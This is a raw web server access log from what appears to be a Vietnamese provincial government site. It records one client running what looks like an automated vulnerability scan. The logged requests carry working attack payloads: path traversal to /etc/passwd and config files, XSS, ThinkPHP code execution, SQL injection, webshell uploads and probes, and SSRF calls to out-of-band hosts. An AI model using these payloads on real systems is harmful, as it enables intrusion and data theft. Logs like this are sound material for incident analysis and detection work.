https://bcvt.kontum.gov.vn/ 200 0 0 69169 2023-10-15 19:34:07 103.153.214.94 GET /search32.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:09 103.153.214.94 GET /transparent-bg.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:09 103.153.214.94 GET /slider-handle.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 315 2023-10-15 19:34:09 103.153.214.94 GET /raster-symbology-editor-stretch-type-min-max.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:10 103.153.214.94 GET /raster-symbology-editor-stretch-type-none.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:10 103.153.214.94 GET /raster-symbology-editor-stretch-type-standard-deviation.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:10 103.153.214.94 GET /raster-symbology-editor-stretch-type-percent-clip.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:11 103.153.214.94 GET /raster-symbology-editor-band-combination-natural-color.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 314 2023-10-15 19:34:11 103.153.214.94 GET /raster-symbology-editor-band-combination-land-water.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 320 2023-10-15 19:34:11 103.153.214.94 GET /raster-symbology-editor-band-combination-landuse.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:13 103.153.214.94 GET /raster-symbology-editor-band-combination-bathymetric.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:13 103.153.214.94 GET /raster-symbology-editor-band-combination-vegetation.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:14 103.153.214.94 GET /raster-symbology-editor-band-combination-color-infrared.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 315 2023-10-15 19:34:14 103.153.214.94 GET /raster-symbology-editor-symbology-type-rgb.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 313 2023-10-15 19:34:14 103.153.214.94 GET /raster-symbology-editor-symbology-type-stretch.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 331 2023-10-15 19:34:16 103.153.214.94 GET /raster-symbology-editor-symbology-type-unique-value.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 331 2023-10-15 19:34:16 103.153.214.94 GET /raster-symbology-editor-symbology-type-discrete.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 328 2023-10-15 19:34:16 103.153.214.94 GET /handles.png - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 326 2023-10-15 19:34:18 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 330 2023-10-15 19:34:25 103.153.214.94 GET /favicon.ico - 443 - 154.50.136.32 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 995 7507 2023-10-15 19:35:57 103.153.214.94 POST /royal_event/companyprofile.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 204 2023-10-15 19:37:17 103.153.214.94 POST /login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 205 2023-10-15 19:38:17 103.153.214.94 POST /login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 208 2023-10-15 19:38:18 103.153.214.94 GET /EXCU_SHELL - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203 2023-10-15 19:38:44 103.153.214.94 GET /download.do file=../../../../config.text 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-15 19:38:49 103.153.214.94 GET /(download)/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 201 2023-10-15 19:39:13 103.153.214.94 POST /(download)/tmp/poc.txt - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 202 2023-10-15 19:40:38 103.153.214.94 GET /tool/log/c.php strip_slashes=md5&host=2WfF0nhsBJlnf55Djj3l1llz2J9 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 211 2023-10-15 19:41:34 103.153.214.94 GET /ui/login.php user=admin 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202 2023-10-15 19:42:38 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 223 2023-10-15 19:43:22 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename=WEB-INF/web.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 19:43:54 103.153.214.94 GET /seeyon/thirdpartyController.do.css/..;/ajax.do - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 19:45:40 103.153.214.94 GET /yyoa/ext/https/getSessionList.jsp cmd=getAll 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 19:47:22 103.153.214.94 POST /scrm/crm/admin - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 204 2023-10-15 19:48:30 103.153.214.94 GET / xmlcontrol=body%20onload=alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 208 2023-10-15 19:53:44 103.153.214.94 GET /render.html url=https://oast.live 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 204 2023-10-15 19:55:48 103.153.214.94 POST /actuator/env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 204 2023-10-15 19:56:29 103.153.214.94 GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-15 19:56:31 103.153.214.94 GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 19:56:57 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206 2023-10-15 19:58:00 103.153.214.94 GET /plugins/address_add/add.php first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208 2023-10-15 19:58:47 103.153.214.94 GET /plugins/vkeyboard/vkeyboard.php passformname=%22%3E%3Cscript%3Ealert%28100709803%29%3B%3C%2Fscript%3E%3Cscript%3E%2F%2A 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 202 2023-10-15 19:59:07 103.153.214.94 GET /index.php g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF'); 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 246 2023-10-15 19:59:10 103.153.214.94 GET /src/read_body.php mailbox=/etc/passwd&passed_id=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-15 19:59:12 103.153.214.94 GET /src/download.php absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200 2023-10-15 20:00:15 103.153.214.94 GET / a=display&templateFile=README.md 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 212 2023-10-15 20:01:45 103.153.214.94 GET /index.php a=fetch&content=%3C%3Fphp+file_put_contents%28%222WfF0pvv4AU495Lvx451hr0xEdR.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206 2023-10-15 20:01:47 103.153.214.94 GET /2WfF0pvv4AU495Lvx451hr0xEdR.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 20:02:46 103.153.214.94 GET /index.php s=/index/index/name/$%7B@phpinfo()%7D 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 202 2023-10-15 20:02:56 103.153.214.94 POST / s=index/index/index 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 209 2023-10-15 20:03:29 103.153.214.94 GET / s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-15 20:04:05 103.153.214.94 POST /index.php s=captcha 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 202 2023-10-15 20:04:59 103.153.214.94 GET /index.php ids[0,updatexml(0,concat(0xa,user()),0)]=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-15 20:06:50 103.153.214.94 POST /ispirit/interface/gateway.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 204 2023-10-15 20:08:53 103.153.214.94 POST /general/userinfo.php UID=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 206 2023-10-15 20:13:09 103.153.214.94 GET /ueditor/php/controller.php action=catchimage&source[]=http://127.0.0.1:024820/?1.png 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 211 2023-10-15 20:13:09 103.153.214.94 GET /ueditor/jsp/controller.jsp action=catchimage&source[]=http://127.0.0.1:770145/?1.png 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 201 2023-10-15 20:15:08 103.153.214.94 POST /ueditor/php/controller.php action=uploadfile 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 819 2023-10-15 20:16:19 103.153.214.94 GET /arcade.php act=Arcade&do=stats&comment=a&s_id=1' 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-15 20:17:26 103.153.214.94 GET /login/ redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 205 2023-10-15 20:17:43 103.153.214.94 POST /hybridity/api/sessions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 201 2023-10-15 20:19:41 103.153.214.94 GET /portal/info.jsp - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 209 2023-10-15 20:21:39 103.153.214.94 POST /login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/login.jsp 405 0 1 202 2023-10-15 20:23:14 103.153.214.94 POST /ui/login.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/ui/login.action 405 0 1 205 2023-10-15 20:23:15 103.153.214.94 GET /eam/vib id=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205 2023-10-15 20:23:37 103.153.214.94 PUT /api/2.0/services/usermgmt/password/ccwgnm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 0 2 220 2023-10-15 20:23:39 103.153.214.94 PUT /api/2.0/services/usermgmt/password/ccwgnm - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 0 2 206 2023-10-15 20:24:41 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-15 20:24:41 103.153.214.94 GET /eam/vib id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 20:24:43 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 20:25:41 103.153.214.94 GET /websso/SAML2/SSO/vsphere.local SAMLRequest 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205 2023-10-15 20:26:54 103.153.214.94 GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo url=https://ckjv7uic8b6p3donsoog8uoc3imd488wg.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-15 20:33:17 103.153.214.94 POST /suite-api/api/auth/token/acquire - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn/ui/ 405 0 1 834 2023-10-15 20:34:16 103.153.214.94 GET /weaver/ln.FileDownload fpath=../ecology/WEB-INF/web.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 20:34:24 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 205 2023-10-15 20:34:26 103.153.214.94 GET /page/exportImport/fileTransfer/2WfF0i2imERtE6zi6COFDeHSuwg.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 20:34:56 103.153.214.94 GET /mysql_config.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 231 2023-10-15 20:35:32 103.153.214.94 GET /weaver/org.springframework.web.servlet.ResourceServlet resource=/WEB-INF/web.xml 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 233 2023-10-15 20:35:58 103.153.214.94 GET /mobile/plugin/SyncUserInfo.jsp userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 20:36:36 103.153.214.94 GET /js/hrm/getdata.jsp cmd=getSelectAllId&sql=select+547653*865674+as+id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207 2023-10-15 20:38:20 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 862 2023-10-15 20:38:22 103.153.214.94 GET /page/exportImport/fileTransfer/poc.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 20:38:38 103.153.214.94 GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 11 0 208 2023-10-15 20:43:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 873 2023-10-15 20:43:15 103.153.214.94 GET /wp-content/uploads/p3d/2WfF0bVFUSsQChWq5OeaXjGTg4H.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 20:45:31 103.153.214.94 GET /wp-content/plugins/ad-widget/views/modal/ step=../../../../../../../etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207 2023-10-15 20:48:40 103.153.214.94 GET / aam-media=wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210 2023-10-15 20:48:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 206 2023-10-15 20:50:59 103.153.214.94 POST /wp-admin/admin-post.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 205 2023-10-15 20:54:01 103.153.214.94 POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 210 2023-10-15 20:54:04 103.153.214.94 GET /wp-content/uploads/2WfF0aqJ7tGvci0vHtkZArOir9Y.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 229 2023-10-15 20:54:11 103.153.214.94 GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php open=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-15 20:54:47 103.153.214.94 GET /aa404bb a</script><script>alert(/XSS/)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209 2023-10-15 20:55:39 103.153.214.94 GET /wp-includes/ALFA_DATA/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204 2023-10-15 20:55:41 103.153.214.94 GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 20:55:44 103.153.214.94 GET /ALFA_DATA/alfacgiapi/ - 443 - 193.123.37.162 